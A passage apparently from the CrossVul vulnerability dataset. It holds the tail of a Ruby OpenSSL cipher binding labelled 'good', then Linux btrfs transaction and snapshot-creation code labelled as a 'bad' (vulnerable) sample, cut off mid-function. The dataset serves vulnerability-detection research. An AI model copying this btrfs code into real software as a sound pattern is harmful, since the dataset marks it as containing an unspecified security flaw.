rb_define_method(cCipher, "auth_tag_len=", ossl_cipher_set_auth_tag_len, 1);
rb_define_method(cCipher, "authenticated?", ossl_cipher_is_authenticated, 0);
rb_define_method(cCipher, "key_len=", ossl_cipher_set_key_length, 1);
rb_define_method(cCipher, "key_len", ossl_cipher_key_length, 0);
rb_define_method(cCipher, "iv=", ossl_cipher_set_iv, 1);
rb_define_method(cCipher, "iv_len=", ossl_cipher_set_iv_length, 1);
rb_define_method(cCipher, "iv_len", ossl_cipher_iv_length, 0);
rb_define_method(cCipher, "block_size", ossl_cipher_block_size, 0);
rb_define_method(cCipher, "padding=", ossl_cipher_set_padding, 1);
id_auth_tag_len = rb_intern_const("auth_tag_len");
id_key_set = rb_intern_const("key_set");
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_5329_0 |
crossvul-cpp_data_bad_3783_4 | /*
* Copyright (C) 2007 Oracle. All rights reserved.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License v2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 021110-1307, USA.
*/
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/sched.h>
#include <linux/writeback.h>
#include <linux/pagemap.h>
#include <linux/blkdev.h>
#include <linux/uuid.h>
#include "ctree.h"
#include "disk-io.h"
#include "transaction.h"
#include "locking.h"
#include "tree-log.h"
#include "inode-map.h"
#include "volumes.h"
#include "dev-replace.h"
#define BTRFS_ROOT_TRANS_TAG 0
void put_transaction(struct btrfs_transaction *transaction)
{
WARN_ON(atomic_read(&transaction->use_count) == 0);
if (atomic_dec_and_test(&transaction->use_count)) {
BUG_ON(!list_empty(&transaction->list));
WARN_ON(transaction->delayed_refs.root.rb_node);
memset(transaction, 0, sizeof(*transaction));
kmem_cache_free(btrfs_transaction_cachep, transaction);
}
}
static noinline void switch_commit_root(struct btrfs_root *root)
{
free_extent_buffer(root->commit_root);
root->commit_root = btrfs_root_node(root);
}
/*
* either allocate a new transaction or hop into the existing one
*/
static noinline int join_transaction(struct btrfs_root *root, int type)
{
struct btrfs_transaction *cur_trans;
struct btrfs_fs_info *fs_info = root->fs_info;
spin_lock(&fs_info->trans_lock);
loop:
/* The file system has been taken offline. No new transactions. */
if (fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR) {
spin_unlock(&fs_info->trans_lock);
return -EROFS;
}
if (fs_info->trans_no_join) {
/*
* If we are JOIN_NOLOCK we're already committing a current
* transaction, we just need a handle to deal with something
* when committing the transaction, such as inode cache and
* space cache. It is a special case.
*/
if (type != TRANS_JOIN_NOLOCK) {
spin_unlock(&fs_info->trans_lock);
return -EBUSY;
}
}
cur_trans = fs_info->running_transaction;
if (cur_trans) {
if (cur_trans->aborted) {
spin_unlock(&fs_info->trans_lock);
return cur_trans->aborted;
}
atomic_inc(&cur_trans->use_count);
atomic_inc(&cur_trans->num_writers);
cur_trans->num_joined++;
spin_unlock(&fs_info->trans_lock);
return 0;
}
spin_unlock(&fs_info->trans_lock);
/*
* If we are ATTACH, we just want to catch the current transaction,
* and commit it. If there is no transaction, just return ENOENT.
*/
if (type == TRANS_ATTACH)
return -ENOENT;
cur_trans = kmem_cache_alloc(btrfs_transaction_cachep, GFP_NOFS);
if (!cur_trans)
return -ENOMEM;
spin_lock(&fs_info->trans_lock);
if (fs_info->running_transaction) {
/*
* someone started a transaction after we unlocked. Make sure
* to redo the trans_no_join checks above
*/
kmem_cache_free(btrfs_transaction_cachep, cur_trans);
cur_trans = fs_info->running_transaction;
goto loop;
} else if (fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR) {
spin_unlock(&fs_info->trans_lock);
kmem_cache_free(btrfs_transaction_cachep, cur_trans);
return -EROFS;
}
atomic_set(&cur_trans->num_writers, 1);
cur_trans->num_joined = 0;
init_waitqueue_head(&cur_trans->writer_wait);
init_waitqueue_head(&cur_trans->commit_wait);
cur_trans->in_commit = 0;
cur_trans->blocked = 0;
/*
* One for this trans handle, one so it will live on until we
* commit the transaction.
*/
atomic_set(&cur_trans->use_count, 2);
cur_trans->commit_done = 0;
cur_trans->start_time = get_seconds();
cur_trans->delayed_refs.root = RB_ROOT;
cur_trans->delayed_refs.num_entries = 0;
cur_trans->delayed_refs.num_heads_ready = 0;
cur_trans->delayed_refs.num_heads = 0;
cur_trans->delayed_refs.flushing = 0;
cur_trans->delayed_refs.run_delayed_start = 0;
/*
* although the tree mod log is per file system and not per transaction,
* the log must never go across transaction boundaries.
*/
smp_mb();
if (!list_empty(&fs_info->tree_mod_seq_list))
WARN(1, KERN_ERR "btrfs: tree_mod_seq_list not empty when "
"creating a fresh transaction\n");
if (!RB_EMPTY_ROOT(&fs_info->tree_mod_log))
WARN(1, KERN_ERR "btrfs: tree_mod_log rb tree not empty when "
"creating a fresh transaction\n");
atomic_set(&fs_info->tree_mod_seq, 0);
spin_lock_init(&cur_trans->commit_lock);
spin_lock_init(&cur_trans->delayed_refs.lock);
INIT_LIST_HEAD(&cur_trans->pending_snapshots);
list_add_tail(&cur_trans->list, &fs_info->trans_list);
extent_io_tree_init(&cur_trans->dirty_pages,
fs_info->btree_inode->i_mapping);
fs_info->generation++;
cur_trans->transid = fs_info->generation;
fs_info->running_transaction = cur_trans;
cur_trans->aborted = 0;
spin_unlock(&fs_info->trans_lock);
return 0;
}
/*
* this does all the record keeping required to make sure that a reference
* counted root is properly recorded in a given transaction. This is required
* to make sure the old root from before we joined the transaction is deleted
* when the transaction commits
*/
static int record_root_in_trans(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
if (root->ref_cows && root->last_trans < trans->transid) {
WARN_ON(root == root->fs_info->extent_root);
WARN_ON(root->commit_root != root->node);
/*
* see below for in_trans_setup usage rules
* we have the reloc mutex held now, so there
* is only one writer in this function
*/
root->in_trans_setup = 1;
/* make sure readers find in_trans_setup before
* they find our root->last_trans update
*/
smp_wmb();
spin_lock(&root->fs_info->fs_roots_radix_lock);
if (root->last_trans == trans->transid) {
spin_unlock(&root->fs_info->fs_roots_radix_lock);
return 0;
}
radix_tree_tag_set(&root->fs_info->fs_roots_radix,
(unsigned long)root->root_key.objectid,
BTRFS_ROOT_TRANS_TAG);
spin_unlock(&root->fs_info->fs_roots_radix_lock);
root->last_trans = trans->transid;
/* this is pretty tricky. We don't want to
* take the relocation lock in btrfs_record_root_in_trans
* unless we're really doing the first setup for this root in
* this transaction.
*
* Normally we'd use root->last_trans as a flag to decide
* if we want to take the expensive mutex.
*
* But, we have to set root->last_trans before we
* init the relocation root, otherwise, we trip over warnings
* in ctree.c. The solution used here is to flag ourselves
* with root->in_trans_setup. When this is 1, we're still
* fixing up the reloc trees and everyone must wait.
*
* When this is zero, they can trust root->last_trans and fly
* through btrfs_record_root_in_trans without having to take the
* lock. smp_wmb() makes sure that all the writes above are
* done before we pop in the zero below
*/
btrfs_init_reloc_root(trans, root);
smp_wmb();
root->in_trans_setup = 0;
}
return 0;
}
int btrfs_record_root_in_trans(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
if (!root->ref_cows)
return 0;
/*
* see record_root_in_trans for comments about in_trans_setup usage
* and barriers
*/
smp_rmb();
if (root->last_trans == trans->transid &&
!root->in_trans_setup)
return 0;
mutex_lock(&root->fs_info->reloc_mutex);
record_root_in_trans(trans, root);
mutex_unlock(&root->fs_info->reloc_mutex);
return 0;
}
/* wait for commit against the current transaction to become unblocked
* when this is done, it is safe to start a new transaction, but the current
* transaction might not be fully on disk.
*/
static void wait_current_trans(struct btrfs_root *root)
{
struct btrfs_transaction *cur_trans;
spin_lock(&root->fs_info->trans_lock);
cur_trans = root->fs_info->running_transaction;
if (cur_trans && cur_trans->blocked) {
atomic_inc(&cur_trans->use_count);
spin_unlock(&root->fs_info->trans_lock);
wait_event(root->fs_info->transaction_wait,
!cur_trans->blocked);
put_transaction(cur_trans);
} else {
spin_unlock(&root->fs_info->trans_lock);
}
}
static int may_wait_transaction(struct btrfs_root *root, int type)
{
if (root->fs_info->log_root_recovering)
return 0;
if (type == TRANS_USERSPACE)
return 1;
if (type == TRANS_START &&
!atomic_read(&root->fs_info->open_ioctl_trans))
return 1;
return 0;
}
static struct btrfs_trans_handle *
start_transaction(struct btrfs_root *root, u64 num_items, int type,
enum btrfs_reserve_flush_enum flush)
{
struct btrfs_trans_handle *h;
struct btrfs_transaction *cur_trans;
u64 num_bytes = 0;
int ret;
u64 qgroup_reserved = 0;
if (root->fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR)
return ERR_PTR(-EROFS);
if (current->journal_info) {
WARN_ON(type != TRANS_JOIN && type != TRANS_JOIN_NOLOCK);
h = current->journal_info;
h->use_count++;
WARN_ON(h->use_count > 2);
h->orig_rsv = h->block_rsv;
h->block_rsv = NULL;
goto got_it;
}
/*
* Do the reservation before we join the transaction so we can do all
* the appropriate flushing if need be.
*/
if (num_items > 0 && root != root->fs_info->chunk_root) {
if (root->fs_info->quota_enabled &&
is_fstree(root->root_key.objectid)) {
qgroup_reserved = num_items * root->leafsize;
ret = btrfs_qgroup_reserve(root, qgroup_reserved);
if (ret)
return ERR_PTR(ret);
}
num_bytes = btrfs_calc_trans_metadata_size(root, num_items);
ret = btrfs_block_rsv_add(root,
&root->fs_info->trans_block_rsv,
num_bytes, flush);
if (ret)
return ERR_PTR(ret);
}
again:
h = kmem_cache_alloc(btrfs_trans_handle_cachep, GFP_NOFS);
if (!h)
return ERR_PTR(-ENOMEM);
/*
* If we are JOIN_NOLOCK we're already committing a transaction and
* waiting on this guy, so we don't need to do the sb_start_intwrite
* because we're already holding a ref. We need this because we could
* have raced in and did an fsync() on a file which can kick a commit
* and then we deadlock with somebody doing a freeze.
*
* If we are ATTACH, it means we just want to catch the current
* transaction and commit it, so we needn't do sb_start_intwrite().
*/
if (type < TRANS_JOIN_NOLOCK)
sb_start_intwrite(root->fs_info->sb);
if (may_wait_transaction(root, type))
wait_current_trans(root);
do {
ret = join_transaction(root, type);
if (ret == -EBUSY)
wait_current_trans(root);
} while (ret == -EBUSY);
if (ret < 0) {
/* We must get the transaction if we are JOIN_NOLOCK. */
BUG_ON(type == TRANS_JOIN_NOLOCK);
if (type < TRANS_JOIN_NOLOCK)
sb_end_intwrite(root->fs_info->sb);
kmem_cache_free(btrfs_trans_handle_cachep, h);
return ERR_PTR(ret);
}
cur_trans = root->fs_info->running_transaction;
h->transid = cur_trans->transid;
h->transaction = cur_trans;
h->blocks_used = 0;
h->bytes_reserved = 0;
h->root = root;
h->delayed_ref_updates = 0;
h->use_count = 1;
h->adding_csums = 0;
h->block_rsv = NULL;
h->orig_rsv = NULL;
h->aborted = 0;
h->qgroup_reserved = qgroup_reserved;
h->delayed_ref_elem.seq = 0;
h->type = type;
INIT_LIST_HEAD(&h->qgroup_ref_list);
INIT_LIST_HEAD(&h->new_bgs);
smp_mb();
if (cur_trans->blocked && may_wait_transaction(root, type)) {
btrfs_commit_transaction(h, root);
goto again;
}
if (num_bytes) {
trace_btrfs_space_reservation(root->fs_info, "transaction",
h->transid, num_bytes, 1);
h->block_rsv = &root->fs_info->trans_block_rsv;
h->bytes_reserved = num_bytes;
}
got_it:
btrfs_record_root_in_trans(h, root);
if (!current->journal_info && type != TRANS_USERSPACE)
current->journal_info = h;
return h;
}
struct btrfs_trans_handle *btrfs_start_transaction(struct btrfs_root *root,
int num_items)
{
return start_transaction(root, num_items, TRANS_START,
BTRFS_RESERVE_FLUSH_ALL);
}
struct btrfs_trans_handle *btrfs_start_transaction_lflush(
struct btrfs_root *root, int num_items)
{
return start_transaction(root, num_items, TRANS_START,
BTRFS_RESERVE_FLUSH_LIMIT);
}
struct btrfs_trans_handle *btrfs_join_transaction(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_JOIN, 0);
}
struct btrfs_trans_handle *btrfs_join_transaction_nolock(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_JOIN_NOLOCK, 0);
}
struct btrfs_trans_handle *btrfs_start_ioctl_transaction(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_USERSPACE, 0);
}
struct btrfs_trans_handle *btrfs_attach_transaction(struct btrfs_root *root)
{
return start_transaction(root, 0, TRANS_ATTACH, 0);
}
/* wait for a transaction commit to be fully complete */
static noinline void wait_for_commit(struct btrfs_root *root,
struct btrfs_transaction *commit)
{
wait_event(commit->commit_wait, commit->commit_done);
}
int btrfs_wait_for_commit(struct btrfs_root *root, u64 transid)
{
struct btrfs_transaction *cur_trans = NULL, *t;
int ret = 0;
if (transid) {
if (transid <= root->fs_info->last_trans_committed)
goto out;
ret = -EINVAL;
/* find specified transaction */
spin_lock(&root->fs_info->trans_lock);
list_for_each_entry(t, &root->fs_info->trans_list, list) {
if (t->transid == transid) {
cur_trans = t;
atomic_inc(&cur_trans->use_count);
ret = 0;
break;
}
if (t->transid > transid) {
ret = 0;
break;
}
}
spin_unlock(&root->fs_info->trans_lock);
/* The specified transaction doesn't exist */
if (!cur_trans)
goto out;
} else {
/* find newest transaction that is committing | committed */
spin_lock(&root->fs_info->trans_lock);
list_for_each_entry_reverse(t, &root->fs_info->trans_list,
list) {
if (t->in_commit) {
if (t->commit_done)
break;
cur_trans = t;
atomic_inc(&cur_trans->use_count);
break;
}
}
spin_unlock(&root->fs_info->trans_lock);
if (!cur_trans)
goto out; /* nothing committing|committed */
}
wait_for_commit(root, cur_trans);
put_transaction(cur_trans);
out:
return ret;
}
void btrfs_throttle(struct btrfs_root *root)
{
if (!atomic_read(&root->fs_info->open_ioctl_trans))
wait_current_trans(root);
}
static int should_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
ret = btrfs_block_rsv_check(root, &root->fs_info->global_block_rsv, 5);
return ret ? 1 : 0;
}
int btrfs_should_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
struct btrfs_transaction *cur_trans = trans->transaction;
int updates;
int err;
smp_mb();
if (cur_trans->blocked || cur_trans->delayed_refs.flushing)
return 1;
updates = trans->delayed_ref_updates;
trans->delayed_ref_updates = 0;
if (updates) {
err = btrfs_run_delayed_refs(trans, root, updates);
if (err) /* Error code will also eval true */
return err;
}
return should_end_transaction(trans, root);
}
static int __btrfs_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root, int throttle)
{
struct btrfs_transaction *cur_trans = trans->transaction;
struct btrfs_fs_info *info = root->fs_info;
int count = 0;
int lock = (trans->type != TRANS_JOIN_NOLOCK);
int err = 0;
if (--trans->use_count) {
trans->block_rsv = trans->orig_rsv;
return 0;
}
/*
* do the qgroup accounting as early as possible
*/
err = btrfs_delayed_refs_qgroup_accounting(trans, info);
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
/*
* the same root has to be passed to start_transaction and
* end_transaction. Subvolume quota depends on this.
*/
WARN_ON(trans->root != root);
if (trans->qgroup_reserved) {
btrfs_qgroup_free(root, trans->qgroup_reserved);
trans->qgroup_reserved = 0;
}
if (!list_empty(&trans->new_bgs))
btrfs_create_pending_block_groups(trans, root);
while (count < 2) {
unsigned long cur = trans->delayed_ref_updates;
trans->delayed_ref_updates = 0;
if (cur &&
trans->transaction->delayed_refs.num_heads_ready > 64) {
trans->delayed_ref_updates = 0;
btrfs_run_delayed_refs(trans, root, cur);
} else {
break;
}
count++;
}
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
if (!list_empty(&trans->new_bgs))
btrfs_create_pending_block_groups(trans, root);
if (lock && !atomic_read(&root->fs_info->open_ioctl_trans) &&
should_end_transaction(trans, root)) {
trans->transaction->blocked = 1;
smp_wmb();
}
if (lock && cur_trans->blocked && !cur_trans->in_commit) {
if (throttle) {
/*
* We may race with somebody else here so end up having
* to call end_transaction on ourselves again, so inc
* our use_count.
*/
trans->use_count++;
return btrfs_commit_transaction(trans, root);
} else {
wake_up_process(info->transaction_kthread);
}
}
if (trans->type < TRANS_JOIN_NOLOCK)
sb_end_intwrite(root->fs_info->sb);
WARN_ON(cur_trans != info->running_transaction);
WARN_ON(atomic_read(&cur_trans->num_writers) < 1);
atomic_dec(&cur_trans->num_writers);
smp_mb();
if (waitqueue_active(&cur_trans->writer_wait))
wake_up(&cur_trans->writer_wait);
put_transaction(cur_trans);
if (current->journal_info == trans)
current->journal_info = NULL;
if (throttle)
btrfs_run_delayed_iputs(root);
if (trans->aborted ||
root->fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR) {
err = -EIO;
}
assert_qgroups_uptodate(trans);
memset(trans, 0, sizeof(*trans));
kmem_cache_free(btrfs_trans_handle_cachep, trans);
return err;
}
int btrfs_end_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
ret = __btrfs_end_transaction(trans, root, 0);
if (ret)
return ret;
return 0;
}
int btrfs_end_transaction_throttle(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
ret = __btrfs_end_transaction(trans, root, 1);
if (ret)
return ret;
return 0;
}
int btrfs_end_transaction_dmeta(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
return __btrfs_end_transaction(trans, root, 1);
}
/*
* when btree blocks are allocated, they have some corresponding bits set for
* them in one of two extent_io trees. This is used to make sure all of
* those extents are sent to disk but does not wait on them
*/
int btrfs_write_marked_extents(struct btrfs_root *root,
struct extent_io_tree *dirty_pages, int mark)
{
int err = 0;
int werr = 0;
struct address_space *mapping = root->fs_info->btree_inode->i_mapping;
struct extent_state *cached_state = NULL;
u64 start = 0;
u64 end;
while (!find_first_extent_bit(dirty_pages, start, &start, &end,
mark, &cached_state)) {
convert_extent_bit(dirty_pages, start, end, EXTENT_NEED_WAIT,
mark, &cached_state, GFP_NOFS);
cached_state = NULL;
err = filemap_fdatawrite_range(mapping, start, end);
if (err)
werr = err;
cond_resched();
start = end + 1;
}
if (err)
werr = err;
return werr;
}
/*
* when btree blocks are allocated, they have some corresponding bits set for
* them in one of two extent_io trees. This is used to make sure all of
* those extents are on disk for transaction or log commit. We wait
* on all the pages and clear them from the dirty pages state tree
*/
int btrfs_wait_marked_extents(struct btrfs_root *root,
struct extent_io_tree *dirty_pages, int mark)
{
int err = 0;
int werr = 0;
struct address_space *mapping = root->fs_info->btree_inode->i_mapping;
struct extent_state *cached_state = NULL;
u64 start = 0;
u64 end;
while (!find_first_extent_bit(dirty_pages, start, &start, &end,
EXTENT_NEED_WAIT, &cached_state)) {
clear_extent_bit(dirty_pages, start, end, EXTENT_NEED_WAIT,
0, 0, &cached_state, GFP_NOFS);
err = filemap_fdatawait_range(mapping, start, end);
if (err)
werr = err;
cond_resched();
start = end + 1;
}
if (err)
werr = err;
return werr;
}
/*
* when btree blocks are allocated, they have some corresponding bits set for
* them in one of two extent_io trees. This is used to make sure all of
* those extents are on disk for transaction or log commit
*/
int btrfs_write_and_wait_marked_extents(struct btrfs_root *root,
struct extent_io_tree *dirty_pages, int mark)
{
int ret;
int ret2;
ret = btrfs_write_marked_extents(root, dirty_pages, mark);
ret2 = btrfs_wait_marked_extents(root, dirty_pages, mark);
if (ret)
return ret;
if (ret2)
return ret2;
return 0;
}
int btrfs_write_and_wait_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
if (!trans || !trans->transaction) {
struct inode *btree_inode;
btree_inode = root->fs_info->btree_inode;
return filemap_write_and_wait(btree_inode->i_mapping);
}
return btrfs_write_and_wait_marked_extents(root,
&trans->transaction->dirty_pages,
EXTENT_DIRTY);
}
/*
* this is used to update the root pointer in the tree of tree roots.
*
* But, in the case of the extent allocation tree, updating the root
* pointer may allocate blocks which may change the root of the extent
* allocation tree.
*
* So, this loops and repeats and makes sure the cowonly root didn't
* change while the root pointer was being updated in the metadata.
*/
static int update_cowonly_root(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
int ret;
u64 old_root_bytenr;
u64 old_root_used;
struct btrfs_root *tree_root = root->fs_info->tree_root;
old_root_used = btrfs_root_used(&root->root_item);
btrfs_write_dirty_block_groups(trans, root);
while (1) {
old_root_bytenr = btrfs_root_bytenr(&root->root_item);
if (old_root_bytenr == root->node->start &&
old_root_used == btrfs_root_used(&root->root_item))
break;
btrfs_set_root_node(&root->root_item, root->node);
ret = btrfs_update_root(trans, tree_root,
&root->root_key,
&root->root_item);
if (ret)
return ret;
old_root_used = btrfs_root_used(&root->root_item);
ret = btrfs_write_dirty_block_groups(trans, root);
if (ret)
return ret;
}
if (root != root->fs_info->extent_root)
switch_commit_root(root);
return 0;
}
/*
* update all the cowonly tree roots on disk
*
* The error handling in this function may not be obvious. Any of the
* failures will cause the file system to go offline. We still need
* to clean up the delayed refs.
*/
static noinline int commit_cowonly_roots(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
struct btrfs_fs_info *fs_info = root->fs_info;
struct list_head *next;
struct extent_buffer *eb;
int ret;
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret)
return ret;
eb = btrfs_lock_root_node(fs_info->tree_root);
ret = btrfs_cow_block(trans, fs_info->tree_root, eb, NULL,
0, &eb);
btrfs_tree_unlock(eb);
free_extent_buffer(eb);
if (ret)
return ret;
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret)
return ret;
ret = btrfs_run_dev_stats(trans, root->fs_info);
WARN_ON(ret);
ret = btrfs_run_dev_replace(trans, root->fs_info);
WARN_ON(ret);
ret = btrfs_run_qgroups(trans, root->fs_info);
BUG_ON(ret);
/* run_qgroups might have added some more refs */
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
BUG_ON(ret);
while (!list_empty(&fs_info->dirty_cowonly_roots)) {
next = fs_info->dirty_cowonly_roots.next;
list_del_init(next);
root = list_entry(next, struct btrfs_root, dirty_list);
ret = update_cowonly_root(trans, root);
if (ret)
return ret;
}
down_write(&fs_info->extent_commit_sem);
switch_commit_root(fs_info->extent_root);
up_write(&fs_info->extent_commit_sem);
btrfs_after_dev_replace_commit(fs_info);
return 0;
}
/*
* dead roots are old snapshots that need to be deleted. This allocates
* a dirty root struct and adds it into the list of dead roots that need to
* be deleted
*/
int btrfs_add_dead_root(struct btrfs_root *root)
{
spin_lock(&root->fs_info->trans_lock);
list_add(&root->root_list, &root->fs_info->dead_roots);
spin_unlock(&root->fs_info->trans_lock);
return 0;
}
/*
* update all the cowonly tree roots on disk
*/
static noinline int commit_fs_roots(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
struct btrfs_root *gang[8];
struct btrfs_fs_info *fs_info = root->fs_info;
int i;
int ret;
int err = 0;
spin_lock(&fs_info->fs_roots_radix_lock);
while (1) {
ret = radix_tree_gang_lookup_tag(&fs_info->fs_roots_radix,
(void **)gang, 0,
ARRAY_SIZE(gang),
BTRFS_ROOT_TRANS_TAG);
if (ret == 0)
break;
for (i = 0; i < ret; i++) {
root = gang[i];
radix_tree_tag_clear(&fs_info->fs_roots_radix,
(unsigned long)root->root_key.objectid,
BTRFS_ROOT_TRANS_TAG);
spin_unlock(&fs_info->fs_roots_radix_lock);
btrfs_free_log(trans, root);
btrfs_update_reloc_root(trans, root);
btrfs_orphan_commit_root(trans, root);
btrfs_save_ino_cache(root, trans);
/* see comments in should_cow_block() */
root->force_cow = 0;
smp_wmb();
if (root->commit_root != root->node) {
mutex_lock(&root->fs_commit_mutex);
switch_commit_root(root);
btrfs_unpin_free_ino(root);
mutex_unlock(&root->fs_commit_mutex);
btrfs_set_root_node(&root->root_item,
root->node);
}
err = btrfs_update_root(trans, fs_info->tree_root,
&root->root_key,
&root->root_item);
spin_lock(&fs_info->fs_roots_radix_lock);
if (err)
break;
}
}
spin_unlock(&fs_info->fs_roots_radix_lock);
return err;
}
/*
* defrag a given btree. If cacheonly == 1, this won't read from the disk,
* otherwise every leaf in the btree is read and defragged.
*/
int btrfs_defrag_root(struct btrfs_root *root, int cacheonly)
{
struct btrfs_fs_info *info = root->fs_info;
struct btrfs_trans_handle *trans;
int ret;
if (xchg(&root->defrag_running, 1))
return 0;
while (1) {
trans = btrfs_start_transaction(root, 0);
if (IS_ERR(trans))
return PTR_ERR(trans);
ret = btrfs_defrag_leaves(trans, root, cacheonly);
btrfs_end_transaction(trans, root);
btrfs_btree_balance_dirty(info->tree_root);
cond_resched();
if (btrfs_fs_closing(root->fs_info) || ret != -EAGAIN)
break;
}
root->defrag_running = 0;
return ret;
}
/*
* new snapshots need to be created at a very specific time in the
* transaction commit. This does the actual creation
*/
static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
struct btrfs_fs_info *fs_info,
struct btrfs_pending_snapshot *pending)
{
struct btrfs_key key;
struct btrfs_root_item *new_root_item;
struct btrfs_root *tree_root = fs_info->tree_root;
struct btrfs_root *root = pending->root;
struct btrfs_root *parent_root;
struct btrfs_block_rsv *rsv;
struct inode *parent_inode;
struct btrfs_path *path;
struct btrfs_dir_item *dir_item;
struct dentry *parent;
struct dentry *dentry;
struct extent_buffer *tmp;
struct extent_buffer *old;
struct timespec cur_time = CURRENT_TIME;
int ret;
u64 to_reserve = 0;
u64 index = 0;
u64 objectid;
u64 root_flags;
uuid_le new_uuid;
path = btrfs_alloc_path();
if (!path) {
ret = pending->error = -ENOMEM;
goto path_alloc_fail;
}
new_root_item = kmalloc(sizeof(*new_root_item), GFP_NOFS);
if (!new_root_item) {
ret = pending->error = -ENOMEM;
goto root_item_alloc_fail;
}
ret = btrfs_find_free_objectid(tree_root, &objectid);
if (ret) {
pending->error = ret;
goto no_free_objectid;
}
btrfs_reloc_pre_snapshot(trans, pending, &to_reserve);
if (to_reserve > 0) {
ret = btrfs_block_rsv_add(root, &pending->block_rsv,
to_reserve,
BTRFS_RESERVE_NO_FLUSH);
if (ret) {
pending->error = ret;
goto no_free_objectid;
}
}
ret = btrfs_qgroup_inherit(trans, fs_info, root->root_key.objectid,
objectid, pending->inherit);
if (ret) {
pending->error = ret;
goto no_free_objectid;
}
key.objectid = objectid;
key.offset = (u64)-1;
key.type = BTRFS_ROOT_ITEM_KEY;
rsv = trans->block_rsv;
trans->block_rsv = &pending->block_rsv;
dentry = pending->dentry;
parent = dget_parent(dentry);
parent_inode = parent->d_inode;
parent_root = BTRFS_I(parent_inode)->root;
record_root_in_trans(trans, parent_root);
/*
* insert the directory item
*/
ret = btrfs_set_inode_index(parent_inode, &index);
BUG_ON(ret); /* -ENOMEM */
/* check if there is a file/dir which has the same name. */
dir_item = btrfs_lookup_dir_item(NULL, parent_root, path,
btrfs_ino(parent_inode),
dentry->d_name.name,
dentry->d_name.len, 0);
if (dir_item != NULL && !IS_ERR(dir_item)) {
pending->error = -EEXIST;
goto fail;
} else if (IS_ERR(dir_item)) {
ret = PTR_ERR(dir_item);
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_release_path(path);
/*
* pull in the delayed directory update
* and the delayed inode item
* otherwise we corrupt the FS during
* snapshot
*/
ret = btrfs_run_delayed_items(trans, root);
if (ret) { /* Transaction aborted */
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
record_root_in_trans(trans, root);
btrfs_set_root_last_snapshot(&root->root_item, trans->transid);
memcpy(new_root_item, &root->root_item, sizeof(*new_root_item));
btrfs_check_and_init_root_item(new_root_item);
root_flags = btrfs_root_flags(new_root_item);
if (pending->readonly)
root_flags |= BTRFS_ROOT_SUBVOL_RDONLY;
else
root_flags &= ~BTRFS_ROOT_SUBVOL_RDONLY;
btrfs_set_root_flags(new_root_item, root_flags);
btrfs_set_root_generation_v2(new_root_item,
trans->transid);
uuid_le_gen(&new_uuid);
memcpy(new_root_item->uuid, new_uuid.b, BTRFS_UUID_SIZE);
memcpy(new_root_item->parent_uuid, root->root_item.uuid,
BTRFS_UUID_SIZE);
new_root_item->otime.sec = cpu_to_le64(cur_time.tv_sec);
new_root_item->otime.nsec = cpu_to_le32(cur_time.tv_nsec);
btrfs_set_root_otransid(new_root_item, trans->transid);
memset(&new_root_item->stime, 0, sizeof(new_root_item->stime));
memset(&new_root_item->rtime, 0, sizeof(new_root_item->rtime));
btrfs_set_root_stransid(new_root_item, 0);
btrfs_set_root_rtransid(new_root_item, 0);
old = btrfs_lock_root_node(root);
ret = btrfs_cow_block(trans, root, old, NULL, 0, &old);
if (ret) {
btrfs_tree_unlock(old);
free_extent_buffer(old);
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_set_lock_blocking(old);
ret = btrfs_copy_root(trans, root, old, &tmp, objectid);
/* clean up in any case */
btrfs_tree_unlock(old);
free_extent_buffer(old);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
/* see comments in should_cow_block() */
root->force_cow = 1;
smp_wmb();
btrfs_set_root_node(new_root_item, tmp);
/* record when the snapshot was created in key.offset */
key.offset = trans->transid;
ret = btrfs_insert_root(trans, tree_root, &key, new_root_item);
btrfs_tree_unlock(tmp);
free_extent_buffer(tmp);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
/*
* insert root back/forward references
*/
ret = btrfs_add_root_ref(trans, tree_root, objectid,
parent_root->root_key.objectid,
btrfs_ino(parent_inode), index,
dentry->d_name.name, dentry->d_name.len);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
key.offset = (u64)-1;
pending->snap = btrfs_read_fs_root_no_name(root->fs_info, &key);
if (IS_ERR(pending->snap)) {
ret = PTR_ERR(pending->snap);
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_reloc_post_snapshot(trans, pending);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
